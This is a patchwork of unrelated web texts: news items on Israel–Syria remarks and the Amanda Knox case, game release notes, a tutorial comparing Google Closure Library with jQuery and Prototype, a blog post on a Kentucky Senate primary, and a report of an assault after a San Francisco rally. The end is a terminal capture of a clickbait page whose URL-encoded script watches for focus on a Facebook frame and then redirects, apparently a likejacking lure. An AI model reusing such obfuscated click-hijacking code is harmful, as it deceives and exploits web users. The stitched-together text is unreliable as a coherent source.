There are those who made a mistake and erased the resistance option , becoming hostage to the peace option .
We must be prepared for both options at the same time . "
Officials at the President 's Residence said the report was false and reiterated Peres 's message , according to which Israel is interested in a peace agreement with Syria rather than in a military conflict .
They clarified that Peres told Medvedev that five Israeli prime ministers were willing to make far - reaching moves for peace , but that the Syrians were the ones who rejected these moves .
" Israel will not allow Syria to have its cake and eat it too , by on one hand demanding withdrawal from the Golan Heights and on the other planting Iranian missiles on the northern hills and continuing its support for terror groups such as Hezbollah and Hamas , " a statement from the residence said .
The president 's associates added that a situation in which the Syrians have the Golan but continue to maintain relations with Iran is inconceivable .
The Prime Minister 's Office refused to address Assad 's remark , but Benjamin Netanyahu 's associates told Ynet that the prime minister had clarified in the past that Israel would be willing to launch negotiations with the Syrians without any preconditions .
They stressed , however , that there was no one who could offer territorial concessions on behalf of the prime minister .
Valve announces a brand new single player Mutation , called Last Man On Earth , is available this week to owners of Left 4 Dead 2 ( L4D2 ) “ The Passing ” DLC .
Last Man
On Earth , mixes up the award winning multiplayer gameplay for a more solitary pursuit , removing the co-op aspect and instead a sole Survivor with no bot companions is pitted against an army of Special Infected .
The L4D2 team is encouraging players to submit their best 60 - second clip of playing Last Man on Earth to YouTube so everyone can share in their single player accomplishments .
If you still crave company , all other game modes are always available including the recently unveiled Realism Versus .
Weekly Mutations are available to all owners of “ The Passing ” DLC on PC and Xbox 360 .
Each week a brand new Mutation is made available .
Rome , Italy ( CNN ) --
A jailed Italian mobster claims he can prove American student Amanda Knox , her former boyfriend and a drifter are innocent of murdering Knox 's British roommate because he knows who the real killer is -- his brother .
Luciano Aviello , 41 , made the statement during a videotaped interview with Knox 's lawyers .
He said he had tried to write the Italian court several times to say that Knox and the others were innocent , but no one ever contacted him , defense and prosecution officials said .
A source close to the case tells CNN that Aviello , who has been in and out of prison since age 17 , was out of prison , living down the street from Knox and Meredith Kercher and under a " protection program " at the time of the murder .
Aviello is serving 17 years in an Italian prison because of his association with the Camorra crime family .
According to Italian media reports and Britain 's Daily Mail , he has testified against the mob at several trials , always from behind a screen to shield his identity .
Kercher , 21 , was found semi-naked with her throat slashed in the house she shared with Knox in November 2007 .
Knox and her former Italian boyfriend , Raffaele Sollecito , 25 , were found guilty in December 2009 of Kercher 's murder and are serving sentences of 26 and 25 years , respectively .
A third person , Rudy Guede , a drifter originally from the Ivory Coast , plead guilty to the murder and is serving a 16 - year prison sentence .
In March , Aviello contacted Knox 's attorneys , who visited him in prison to learn more about his story .
Aviello told Knox 's lawyers during the videotaped interviews that his brother , who was staying with him at the time of Kercher 's murder , came home one night and said he had killed a girl during a botched robbery .
British and Italian media have reported the brother 's whereabouts are unknown and neither the lawyers for Knox nor the prosecution would comment further .
" When he came to my house he had a bloodstained jacket on and was carrying a flick knife .
He said he had broken into a house and killed a girl and then he had run away , " Aviello said in his statement .
Originally from Naples , Aviello says he was living in Perugia at the time of the attack .
" I know [ he was involved ] because my brother confessed to me that he had killed Meredith and he asked me to hide a blood - stained knife and set of keys , " he said , according to an attachment to Knox 's appeal documents .
Aviello told the lawyers that his brother said he and an Albanian man broke into the house and found " the poor English girl , " Kercher and the drifter , Rudy Guede .
Aviello said when Kercher saw them she " started screaming like mad "
The brother " stabbed her in the throat then he tried to stifle her screams , " Aviello said .
" Meredith defended herself like mad , scratching and hitting out at him . "
Aviello said he can prove Knox 's innocence and his brother 's involvement because of evidence he buried at his home .
" I had everything under a little wall behind my house , " he said .
" I am happy to stand up in court and confirm all this and wrote to the court several times to tell them but was never questioned . "
Italian prosecutor Giuliano Mignini , who led the case against Knox and Sollecito , told British and Italian media that Aviello 's claims were irrelevant since the court already deemed him not credible and did n't interview him .
Allevio sent the court three letters during the course of the trial , one of which was obtained by CNN .
In the letter , which was sent to the court in 2009 , Aviello said he was writing because he wanted to clarify " what the media has distorted " about Knox , Sollecito and Guede 's involvement in the crime .
Allevio also said that he met Sollecito while he was in prison and even expressed his " bewilderment " at how out of hand the trial had gotten .
Allevio said in the letter that he knows " the name of the real assassin " because Kercher 's death was committed by " persons that are dear to me . "
He did not identify his brother or anyone else in the 2009 letter , but he has now told Knox 's lawyers his brother was the killer .
Mignini told CNN on Thursday he could n't comment much on Aviello 's assertions because " we need to verify his claims , in general , all of what he is saying . "
Mignini said he has not yet interviewed Aviello , but will begin looking into his background as part of an investigation .
That investigation will include checking out the burial of the key .
Knox 's lawyer , Carlo Dalla Vedova , said he hopes a judge will allow Aviello to testify at Knox 's appeal hearing , which is likely to take place in the fall .
See the evidence presented in the Knox case
" The court should have vetted the reliability of the person and the worthiness of his claims , " Dalla Vedova said .
" We have posed again the same request to the appeals court .
In filing an appeal , Dalla Vedova pointed to Aviello 's letters to the courts , saying they show Knox was not able to present all the witnesses , and that may have influenced the verdict .
Mignini disputed the claim .
We " ca n't simply investigate in the course of a trial every claim that comes up , " Mignini told CNN .
David Marriott , a spokesman for the Knox family , said that while they do n't yet know whether Aviello 's claim is valid , he feels it is only right that Knox get to air all the evidence in court .
Even if the story is n't true , Knox and her lawyers should at least get the chance to investigate it and have his claims heard , Marriott said .
" The fact that the court did n't even decide to question him or at least look further into the claims is a part of what Amanda 's appeal is all about , " he said .
" We do n't know the truth , but the court has the responsibility to check it out . "
Marriott also said he thinks it 's possible Aviello 's statements were n't checked out because Italian police and prosecutors believed they already solved the case .
" There 's no motivation I would guess for the police to actually pursue it , " he said , when asked if the keys , clothing or knife Aviello claims were buried were ever dug up .
" In their minds not only is it over , but why would they investigate something that might show their initial investigation was faulty . "
Hothead Games has announced that their upcoming action - RPG Deathspank will be released on Playstation Network and the Xbox Live Arcade on July 13th and July 14th respectively .
The game is designed by Ron Gilbert , the man behind 1990 ’s The Secret of Monkey Island and will be published by EA .
The game revolves around the the eponymous Deathspank and his mage - sidekick Sparkles .
Describing the game as “ Monkey Island meets Diablo “ , developer Hothead Games indicates the game distinguishes itself by being an “ honestly funny , fun videogame . ”
The main story mode is expected to take approximately ten to fifteen hours to complete , and can be played solo or through local cooperative play .
The game will be exclusively available for digital download through Playstation Network and Xbox Live Arcade , at $ 14.99 or 1200 Microsoft points respectively .
A set of screenshots for Deathspank can be found after the jump .
Late last year , Google released Closure Tools , a trio of open source technologies aimed at developers writing large scale JavaScript applications .
Included in the initial release were Closure Compiler , a sophisticated JavaScript compiler , Closure Library , a massive library of JavaScript code designed for use with the Compiler , and Closure Templates , a templating system implemented in both JavaScript and Java .
The sales pitch was certainly compelling .
Closure had been used internally at Google since 2005 , with contributions from over 400 engineers .
This was the technology that powered Gmail , and several other high profile Google applications ( Docs , Reader , Calendar , Maps and Wave amongst them ) .
Google pitched it as their " standard library " for JavaScript - based applications .
It would have be reasonable to expect that the hype meter would have been off the charts .
Despite this , the response was rather tepid .
The announcement spread broadly , but the standard response seemed to be " so what ? " .
Not much has changed in the six - plus months since its release , either .
In the past 30 days , there have been a grand total of three questions tagged with google - closure on Stack Overflow .
During the same time period , there have been 3,161 questions about jQuery .
So , what 's the problem ?
Is it the confusing name ( a closure is a JavaScript language feature ) ?
" Anti-hype " due to the fact that it was released by Google ?
Exhaustion from the rapid pace of new JavaScript library releases ?
A lack of conceptual documentation ?
Or , is it just too complex to actually use ?
I think all of these may be factors to some degree , but the real reason is much simpler : it 's simply not the right tool for a lot of applications .
That 's not intended as a criticism of Closure Tools , it 's just that it was designed with far different goals than other popular libraries like , say , jQuery and Prototype .
For small applications , blogs , design galleries , or static content sites which just need some simple form validation , Closure is probably overkill .
It is a perfectly suitable solution , as the Closure Compiler enables an efficient footprint for applications of any size .
However , the learning curve is quite steep , there are far fewer examples , and you need to find a way to integrate the compiler into your workflow .
With a library like jQuery , you just add a script reference ( if using a CDN , you do n't even need to upload it to your server ) and start coding away .
So aside from large Web applications from Google , who is Closure for ?
Having studied Closure exhaustively for the past few weeks , I would suggest that it is an excellent option to consider for any " medium - plus " sized application , regardless of the back - end " technology stack " .
These applications will almost always involve multiple developers , and are likely to contain at least 100 kilobytes of non-library source code .
If there is no build system in place to combine scripts , an average page in an application of this size probably references 5 to 10 external scripts , if not more .
If your application has reached this level of complexity ( or you project it to ) , this is a good starting point where the benefits of Closure start to become significant .
The impact of Closure Compiler on your code 's execution speed and size ( and , if your scripts are n't being combined , HTTP request overhead ) will be significant , and you 're likely to be in position to benefit from a large portion of Closure Library as well .
As your application grows , so do the benefits .
Let 's take a closer look at the two primary components of Closure Tools ( we 'll not be covering Closure Templates ) .
Closure Compiler
The Closure Compiler is the arguably the flagship component of Closure Tools .
The Compiler supports two primary optimization modes : " minification " ( whitespace - only or simple ) and " advanced compilation " .
A JavaScript minifier is nothing new .
There have been high quality minifiers available for several years .
A JavaScript compiler is n't even necessarily new , as compilers from other languages to JavaScript have also been floating around for some time .
What is unique about Closure Compiler is that it is a JavaScript - to - JavaScript compiler , capable of performing optimizations to JavaScript code that were previously unheard of .
Closure Compiler can be used as a standalone component against an existing JavaScript codebase , or in concert with Closure Library , which has been explicitly designed for maximum optimization when used with the compiler .
It 's easier to understand the power of these advanced compilation features by way of a simple example .
Consider the following script :
function unused ( ) { alert ( 'i am only ever called by a function that is uncalled ' ) ; } function unused2 ( ) { unused ( ) ; alert ( 'i am never called ' ) ; } function hell o( name ) { alert ( ' Hello , ' + name + '!' ) ; } var hi = hello ; hi(' friend ' ) ;
After running this through the compiler in advanced mode ( which you can easily try for yourself ) , we 're left with the following :
alert ( " Hello , friend ! " ) ;
The result speaks for itself .
The compiler eliminated dead code , inlined functions , optimized string concatenation , and left us with a significantly smaller but functionally identical result .
Hey , where 'd my functions go ?
It might seem strange or abitrary that in the examples above , the unused functions simply disappeared in the output .
The compiler considers this removal perfectly safe and reasonable because it assumes that you have provided it with the entire source code for your application .
If you want one of your functions to be available outside of the context of your core JavaScript code ( say , from a script element in an HTML page ) , you need to explicitly tell the compiler to export it .
See the compiler documentation for details .
This is n't to say that there wo n't be any function calls in your final compiled output if you do n't export anything .
Closure Compiler will only inline code when it considers it appropriate .
When not inlining , functions will typically be renamed .
If the compiler chose not to inline our hello function , for example , the output would look something like the following :
function a ( b ) {alert ( " Hello , " +b+ " ! " ) }a ( " friend " ) ;
I 'm supposed to debug that ?
If your reaction to the above code is one of terror , you are probably not alone .
Anyone who has written large systems in JavaScript knows that debugging code is an inevitable part of the process .
The significant optimizations provided by Closure Compiler might make your code smaller , but they also make it extremely difficult to map back to the original code .
If you experience a runtime failure that only happens in the compiled code , what do you do ?
Fortunately , Closure Compiler is capable of creating a source map , which enables areas of the compiled code to be definitively traced back to the original source from which it was compiled .
Even better , you do n't have to work with the source map file itself , as Google provides Closure Inspector , a Firebug extension ( yes , Firefox only for now ) which integrates into your standard debugging experience .
Is that it ?
While Closure Compiler is an excellent tool for optimizing code size and execution speed , that 's not the only value it provides .
It also supports a huge number of JSDoc annotations which enable it to help you find bugs in your code ( these also allow the compiler to even better optimize your code ) .
For example , we could redefine our hello function from above with a type annotation as follows :
/** @param { string} name */ function hell o( name ) { alert ( ' Hello , ' + name + '!' ) ; }
Here , we have told the compiler that we expect a single parameter of type string .
Now , let 's add some problematic calls to the function :
hello( ) ; hell o( 3.14 ) ;
Now , when we compile this code , the compiler issues the following warnings .
JSC_WRONG_ARGUMENT_COUNT : Function hello : called with 0 argument (s ) .
Function requires at least 1 argument (s ) and no more than 1 argument ( s ) . at line 5 character 5 hello( ) ; ^ JSC_TYPE_MISMATCH : actual parameter 1 of hello does not match formal parameter found : number required : string at line 6 character 6
With large programs in particular , these warnings can help you quickly isolate hard to find bugs that would otherwise only be visible at runtime .
The only downsides are the need to add the JSDoc tags to your code comments ( though these are also quite useful as documentation when reading the code ) , and the need to " cast " from time to time , as below :
// Explicitly " cast " a { Node} to an { Element} var element = /** @type { Element} */ ( node ) ; goog.dom.setTextContent( element , ' success ! ' ) ;
Closure Library
Closure Library is a massive library of JavaScript code optimized for use with Closure Compiler .
In theory , pairing it with the Compiler is optional .
And in fact , this is an incredibly important feature in development environments , as it makes the compilation step optional and dramatically speeds some stages of development .
In production , however , use of the compiler is not optional , as the uncompiled library code is very large , and the strategy used to include the files is not designed to be efficient .
So just how big is Closure Library ?
The following chart provides some indication .
This is the uncompressed , non-minified JavaScript on - disk file size of a few popular libraries ( excluding test code ) , as reported by du .
The file sizes include comments and indentation , so it is not meant to be indicative of the actual number of " lines of code " .
All libraries shown are the current stable versions at the time of this writing :
So yes , the library is indeed massive .
But is it any good ?
For starters , there are no " versions " of Closure Library .
The code is simply updated periodically in a public Subversion repository , which is fed from Google 's internal source control system .
That does n't mean that it's " prerelease " ( or " beta " ) quality , it simply means that Google is confident enough in the quality of the code that the latest release is always considered to be ( in their own words ) " very stable " .
Many parts of Closure Library are actively in production at Google , and it comes with a massive suite of unit tests .
At the end of the day , it 's up to you and or your organization to determine if it is " stable " enough for your needs .
Having spent a large amount of time in various modules of the Closure Library code recently , my personal opinion is that it is uniformly well designed , well documented , and very well written .
So what 's in there , taking up all of that space ?
A surprising amount is in comments , believe it or not .
Closure Library is exhaustively documented , and most of the documentation is inline .
This makes browsing the code a great strategy for learning more about Closure .
As far as the code itself is concerned , some portion of the library is dedicated to things that would be broadly useful in any JavaScript project , including those that do not target Web browsers ( array , crypt , date , math , string , and more ) .
A bigger portion of the code is exclusively designed for JavaScript applications targeting browsers ( dom , editor , fx , history , style , ui , useragent , and more ) .
A good starting point for understanding what 's available in Closure Library is the demos folder ( index ) , where you 'll find examples for things as basic as event handling , and as exotic as a popup " emoji " picker .
Lastly , Closure Library also includes selected third party code .
For example , Dojo's Query implementation is exposed as goog .
dom.query .
Closure Library code is modular , with related code organized into " namespaces " .
This organization is well suited for large scale projects with large teams .
Another advantage of this namespacing strategy is that Closure Library is extremely unlikely to interfere with existing libraries , as all of the library code is organized under a single global symbol ( goog ) .
Note that this does not necessarily mean that other libraries will not impact the behavior of Closure Library .
Existing libraries that pollute the global namespace unpredictably , or modify the prototypes of built - in JavaScript types could cause Closure Library code to behave undesirably ( as it would with any other third party library ) .
To put it more succinctly , Closure Library plays well with others , provided that they too play well with others .
The downside to the namespacing strategy is that your code ends up being more verbose .
There are many ways to control for this .
You might decide that your application wo n't need to interoperate with other libraries , and can safely add aliases for commonly used functions in the global namespace .
For example , if goog.dom.getElement is too much typing for your taste , you can selectively trade off namespacing by simply adding a global alias as $ :
goog.exportSymbol ('$ ' , goog.dom.getElement ) ;
There are , of course , risks to modifying the global namespace in this fashion , so it 's undoubtedly a good thing that the Closure Library designers left the decision to us .
Closure Library vs. jQuery , Prototype
So if we do n't modify the global namespace , what does Closure Library code actually look like ?
This is probably easier to understand by example .
Following are ten simple code examples comparing the syntax of Closure Library to two other popular libraries : jQuery and Prototype .
I created these examples by looking through a few codebases built on top of the libraries , choosing the most popular examples which corresponded to functionality common to all three .
My intent is not to make one library look better than the other , but rather to compare the style and syntax .
The examples are functionally equivalent .
Comparison # 1 : Get a single element by ID
j Query var title = $ ( " #title " ) .
get ( 0 ) ; // - or - var title = $ ( " #title " ) [ 0 ] ; Prototype var title = $ ( " title " ) ; Closure Library var title = goog.dom.getElement (" title " ) ;
Comparison # 2 : Get an array of elements by ID
j Query var elements = $ ( " #title , #description , #footer " ) ; Prototype var elements = $ ( " title " , " description " , " footer " ) ; Closure Library var elements = goog.array.map ( [ " title " , " description " , " footer " ] , goog.dom.getElement ) ;
Comparison # 3 : Find an element 's closest ancestor by element name
j Query var list = $ ( " #list\\.item " ) .closest ( " ul " ) [ 0 ] ; Prototype var list = $ ( " list.item " ) .up ( " ul " ) ; Closure Library var list = goog.dom.getAncestorByTagNameAndClass( goog.dom.getElement(" list.item " ) , goog.dom.TagName.UL ) ;
Comparison # 4 : Hide all paragraphs which are immediate descendants of div elements
j Query $ ( " div > p " ) .hide ( ) ; Prototype $ $ ( " div > p " ) .invoke ( " hide " ) ; Closure Library goog.array.forEach(goog.dom.query ( " div > p " , null ) , function (e ) { goog.style.showElement(e , false ) ; } ) ;
Comparison # 5 : Get an element 's text content
j Query var text = $ ( " #decorateme - 1 " ) .
text ( ) ; Prototype var text = $ ( " decorateme-1 " ).innerHTML.stripTags ( ) ; Closure Library var text = goog.dom.getTextContent(goog.dom.getElement (" decorateme - 1 " ) ) ;
Comparison # 6 : Retrieve the cumulative offset of an element
j Query var offset = $ ( " #positioning " ) .
offset ( ) ; console.log ( " left : " + offset .
left + " px top : " + offset.top + " px " ) ; Prototype var offset = $ ( " positioning " ) .positionedOffset ( ) ; console.log ( " left : " + offset .
left + " px top : " + offset.top + " px " ) ; Closure Library var rect = goog.style.getPageOffset(goog.dom.getElement(" positioning " ) ) ; console.log ( " left : " + rect.x + " px top : " + rect.y + " px " ) ;
Comparison # 7 : Create a DOM element and append to the current document body
j Query $ ( " < div class= \" created \ " id=\" createdDiv\ " > content</div > " ).appendTo( " body " ) ; Prototype $ ( document.body ) .insert ( new Element ( " div " , { " class " : " created " , id : " createdDiv " } ) .update ( " content " ) ) ; Closure Library goog.dom.appendChild ( document.body , goog.dom.createDom( " div " , { className : " created " , id : " createdDiv " } , " content " ) ) ;
Comparison # 8 : Add , remove and toggle CSS classes
j Query var d1 = $ ( " #decorateme - 1 " ) ; var d2 = $ ( " #decorateme - 2 " ) ; d1.toggleClass ( " aaa " ) .removeClass ( " bbb " ) ; d2.addClass ( " bbb " ) ; Prototype var d1 = $ ( " decorateme - 1 " ) ; var d2 = $ ( " decorateme - 2 " ) ; d1.toggleClassName ( " aaa " ).removeClassName( " bbb " ) ; d2.addClassName ( " bbb " ) ; Closure Library var d1 = goog.dom.getElement (" decorateme - 1 " ) ; var d2 = goog.dom.getElement (" decorateme - 2 " ) ; goog.dom.classes.toggle( d1 , " aaa " ) ; goog.dom.classes.remove(d1 , " bbb " ) ; goog.dom.classes.add( d2 , " bbb " ) ;
Comparison # 9 : Create a manual hover effect using mouse events
j Query $ ( " h1 : first " ) .mouseover ( function ( ) { $ ( this ) .css ( " color " , " red " ) ; } ) .mouseout ( function ( ) { $ ( this ) .css ( " color " , " " ) ; } ) ; Prototype function setColor(e , color ) { e.element ( ) .
setStyle ( { color : color } ) ; } var h1 = $ $ ( " h1 " ) [ 0 ] ; h1.observe ( " mouseover " , setColor.bindAsEventListener( this , " red " ) ) ; h1.observe ( " mouseout " , setColor.bindAsEventListener( this , " " ) ) ; Closure Library function setColor ( color , e ) { e.target.style.color = color ; } var h1 = goog.dom.getElementsByTagNameAndClass( " h1 " ) [ 0 ] ; goog.events.listen ( h1 , goog.events.EventType.MOUSEOVER , goog.partial(setColor , " red " ) ) ; goog.events.listen( h1 , goog.events.EventType.MOUSEOUT , goog.partial(setColor , " " ) ) ;
Comparison # 10 : Update the contents of a DOM element using XmlHTTPRequest response content
j Query $.get ( " hello.txt " , null , function ( data ) { $ ( " #ajaxResponse " ) .html( data ) ; } ) ; Prototype new Ajax .
Updater ( " ajaxResponse " , " hello.txt " , { method : " get " } ) ; Closure Library goog.net.XhrIo.send ( " hello.txt " , function(e ) { goog.dom.getElement('ajaxResponse').innerHTML = e.target.getResponseText ( ) ; } ) ;
In general , the Closure Library examples are more verbose than the equivalents written using jQuery and Prototype .
After being run through the compiler , they will be more compact at runtime , but there is some extra visual overhead to deal with when reading and writing Closure Library code .
Of course , as discussed above , Closure Compiler helps a great deal when writing this code , as it can find bugs before you run them in the browser .
All of these libraries are quite easy to work with for such trivial examples as those above .
The real benefits of Closure are found in larger codebases .
If you 're working on such a codebase , or are about to , I strongly suggest giving Closure Tools a look .
Of all the races that will come to an end to tomorrow night , the one that may be the most interesting is the Republican Senate Primary in Kentucky , where the race has essentially become a proxy for the battle between the Establishment GOP and the Tea Party Movement :
FLORENCE , Ky. — Rand Paul grabbed a microphone , climbed onto a short brick wall and told a gathering crowd of supporters to brace for an Election Day uprising on Tuesday .
“ There ’s a Tea Party tidal wave coming .
It ’s already hit Utah and it ’s coming to Kentucky , ” Mr. Paul said , delivering a confident pep talk here in the closing hours of the Republican primary for a United States Senate seat .
“ The day of reckoning is coming .
We cannot elect the same old politicians without getting the same old mess . ”
If his confidence is borne out by victory , it would mark one of the most important moments yet for the Tea Party , the anti-Washington , anti-big government movement that was partially inspired by the quixotic 2008 presidential race of his father , Representative Ron Paul of Texas .
Establishment Republicans — including Senator Mitch McConnell of Kentucky , the minority leader , former Vice President Dick Cheney and the Chamber of Commerce — have united in opposition to Mr. Paul , but optimism was diminishing that their candidate , Trey Grayson , could prevail .
The Paul - Grayson race has been fairly interesting to watch , if only because of the manner in which it ’s laid bare the differences between the establishment GOP and the Tea Parties .
Grayson , Kentucky ’s Secretary of State and a long - time Republican activist , has received support from Washington Republicans like Dick Cheney and Mitch McConnell .
On the other hand Rand Paul , a Lexington , KY eye surgeon who ’s main involvement in politics prior to today was during his father ’s campaigns , has garnered the support of Senators Jim DeMint and the retiring Jim Bunning .
Most recently , Focus on the Family founder James Dobson took the unusual step of switching his endorsement from Grayson to Paul after revealing that an unnamed party , later identified as Mitch McConnell , had been misleading Dobson about Paul ’s views on abortion .
Despite the establishment attacks ,
Paul has maintained a consistent lead in the polls , and , based on where the race stands with one last day of campaigning to go , looks poised to score a decisive victory tomorrow night .
Trey Greyson , meanwhile , has taken the rather unusual ( for a Republican at least ) step of attacking Fox News in the final hours of the campaign :
By frequently putting Rand Paul , the son of Ron Paul and Grayson ’s opponent , on its air , Grayson says the network has all but endorsed Paul and given him an easy way to tout his candidacy without actually meeting Kentucky voters in person .
“ I ’ve been on Fox News once , on a live feed on one of the shows , and I was told I was to expect a certain line of questioning , and I was given a different line of questioning , ” Grayson said .
Referring to Rand Paul , Grayson said , “ He ’s on all of the time . ”
“ His dad had these phenomenal contacts , so … he ’s on Fox News every couple of weeks with softballs , ” said Grayson .
Imitating an anchor ’s voice , Grayson said the questions are softballs such as , “ Rand , tell us about health care , you ’re a doctor .
Rand , tell us about the tea party . ”
When a politician starts saying things like that , especially when there are only a few hours to go before voting starts , you can pretty much conclude that they ’ve seen the last of the internal polls and they ’re pretty sure they ’re going to lose .
As for Paul himself , we ’re likely to be hearing much more from him after Tuesday night .
There ’s still a General Election campaign to get through in November , of course , but the odds of a Republican losing in statewide race Kentucky in a year that seems destined to be good for Republicans in general seem pretty darn low to say the least .
In the meantime , other Republicans might be interesting in figuring out how he ’s accomplished the seeming impossible :
The political genius of Paul is his ability to cultivate a narrative that speaks to all strains of the Tea Party movement at once .
After all , the libertarian purists who loved Ron Paul ’s dissident truth - telling are not natural allies of the Limbaugh Dittoheads who dismissed him as an eccentric .
He sings his libertarianism in the key of Glenn Beck – and he is writing a Republican playbook for the tea party era , turning grassroots energy into electoral power .
Now , less than a week before the primary , polls show Paul ’s lead over Grayson approaching 20 points .
He also leads both of his potential Democratic challengers in the general election polling
It ’s the kind of fusion that Republicans in other states will need to create if they ’re going to prevail as well , and it all started in Kentucky .
After a pro-immigration rally in San Francisco Ca , several people jumped Andrew Yeoman and other members of BANA ( Bay Area National Anarchists ) a fake anarchist group operating out of the East Bay that masks its racism and proto - fascism by using the name anarchist .
SF weekly
http://blogs.sfweekly.com/thesnitch/2010/05/post-immigration_march_scuffle.php
Three members of the Bay Area National Anarchists -- a group that believes in white separatism and which supports the controversial Arizona anti-immigrant law -- were attacked with mace , punches , kicks , and shoves as they left the immigration reform rally Saturday , according to BANA founder Andrew Yeoman .
The thousands of demonstrators marching for immigration reform down Mission Street Saturday afternoon were mostly preaching to the choir here in the sanctuary city .
Drivers honked their horns in support .
People popped their head out of apartments along Mission and tooted noisemakers .
But once the marchers arrived at the Civic Center Plaza for the rally , they were greeted by a small phalanx of counter protesters standing on the sidewalk in front of City Hall , including the Golden Gate Minutemen and four members of the Bay Area National Anarchists ( BANA ) .
Some of the pro-immigration reform demonstrators marched up to the police barricades in front of the Minutemen where the two sides engaged in a shouting match , but police moved the protesters back to the Civic Center Plaza .
But as Yeoman and three other BANA members were leaving the rally and walking near Market and Van Ness , a group of three guys started following and yelling at them .
" I was targeted , " Yeoman told SF Weekly .
" They know me from the videos [ on YouTube ] and being involved in the anarchist movement for years . "
Yeoman says the group following him grew to roughly ten , all white people except for one black man , Yeoman says he crossed the street in an attempt to get away from the group but they followed him and yelled things like " Why do you hate immigrants ? "
" Why are you conservative ? "
He said he saw that two of the men had brass knuckles , yet it was a woman who started the attack by macing Yeoman in the face .
He says his sunglasses kept it from getting in his eyes .
He remembers that two men pushed to then got him to the ground and kicked him , causing welts on his head .
He alleges that they hit BANA member Parker Wilson in the back , and pushed a female member .
Yeoman says a plainclothes cop rushed up to the fight and pulled his gun on him .
" I thought the police was one of them at first , and I thought I was going to get killed . "
Yeoman and the attackers were all told to lay on their stomachs and were handcuffed and questioned .
The Southern Poverty Law Journal wrote in a 2009 article that national anarchists " cloak their bigotry in the language of radical environmentalism and mystical tribalism , pulling recruits from both the extreme right and the far left . "
Yet Yeoman says that he does n't want to push his views on others .
" We support them to live in areas they want to live in for themselves , if its multicultural or whatever it is , " he says .
" They attack us because they disagree with members of our tribe and how our tribe wants to live their lives .
We feel that 's totally unjustified . "
After questioning , the anarchists were let go by the police .
KGO - TV reported that at least two people involved in the fight were arrested and will likely be charged with felony assault and robbery .
While police were unable to confirm details on Saturday night , Yeoman claims the police arrested six in all .
~$ GET http://craziestattoos.blogspot.com/
< meta property =" og : title " content =
" The Guy With The Largest Dick On The Planet " > < meta property = " og : type " content = " article " > < meta property = " og:url " content = " http://craziestattoos.blogspot.com/ " >< link rel= " me " href= " http://www.blogger.com/profile/09319063164064567908 " > < link rel= " openid.server " href = " http://www.blogger.com/openid-server.g " >
<!-- -->< style type=" text/css " >@import url( http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css); div.b - mobile { display : none ;} </ style > < script type =" text / javascript " > function setAttributeOnload ( object , attribute , val ) { if ( window.addEventListener ) { window.addEventListener(" load " , function ( ) { object [ attribute ] = val ; } , false ) ; } else { window.attachEvent( ' onload ' , function ( ) { object [ attribute ] = val ; } ) ; } } </script > < iframe src= "
http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F " marginwidth= " 0 " marginheight= " 0 " id =" navbar - iframe " allowtransparency =" true " title= " Blogger Navigation and Search " frameborder= " 0 " height = " 30 " scrolling =" no " width =
" 100 % " ></iframe > < div></div > < center >< a href= " http://access.im/1/AzO93 " >< img src= "
http://i46.tinypic.com/33ygjk6.jpg "
/></a></center > < script type =" text / javascript " src= "
http://www.blogger.com/static/v1/common/js/4161557039-csitail.js "></script> < script type =" text / javascript " > BLOG_initCsi('classic_blogspot ' ) ;</ script></body >
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html < head > < title > The Guy With The Largest Dick On The Planet </ title > < script src=" jquery.js " type = " text / javascript " ></ script > < script src=" top.js " type = " text / javascript " ></ script > </ head > < body > < script type =" text / javascript " > $ ( document ) .ready ( function ( ) { $ ( " a[ name^='faq - ' ] " ) .each ( function ( ) { $ ( this ).click ( function ( ) { if ( $ ( " # " + this.name ) .is ( ': hidden ' ) ) { $ ( " # " + this.name ) .fadeIn( ' normal ' ) ; $ ( " a[ name^='faq - ' ] " ) . hide ( ' normal ' ) ; } else { $ ( " # " + this.name ).fadeOut ( ' normal ' ) ; } return false ; } ) ; } ) ; } ) ; </script > < style type =" text /css " > . faq - answer { display : none ; } </style > < center > < img src= " 18.png " /></center > < center > < div class = " faq - answer " id = " faq - 1 " >< img src= " pre.jpg " ></div></center > < script src=" bottom.js " type = " text / javascript " ></ script > </ body >
~$ GET http://allhqpics.com/top.js
<!-- document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A' ) ) ; //-->
